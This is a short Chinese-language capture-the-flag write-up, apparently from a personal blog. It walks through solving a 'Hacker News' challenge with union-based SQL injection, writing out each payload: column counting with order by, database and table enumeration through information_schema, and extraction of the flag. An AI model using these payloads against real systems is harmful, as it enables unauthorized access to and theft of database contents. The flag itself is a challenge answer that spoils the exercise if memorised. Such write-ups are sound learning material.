我打开后是这个样子的。突然发现上面有Hacker News，那我就再想会不会需要sql注入，那我直接进行盲注吧。

直接来了一个1‘ order by 3#没有报错，然后我又改成了4，然后就跳到一个空白页面了。这应该是说明出错了。那就证实了有3个字段的。

那我们试一下联合查询：000‘  union select 1,2,3#

  有2、3两个显示位 那我们要爆一下数据库了：000’  union select 1,2,database()# 这说明数据库名是news。 通过数据库名爆出表名：000'  union select 1,2,table_name from information_schema.tables where table_schema='news' # 爆出的表名是secret_table 我们再通过表名搞一下字段名：000'  union select 1,2,column_name from information_schema.columns where table_name='secret_table' # 爆出了两个字段名：id和fl4g。话说，flag怎么成fl4g 最后我们再爆一下数据吧：000' union select 1,id,fl4g from secret_table # 看flag就出来了：QCTF{sq1_inJec7ion_ezzz}   不过这道题确实，比之前做的那些sql注入题要简单一些，继续加油吧！！！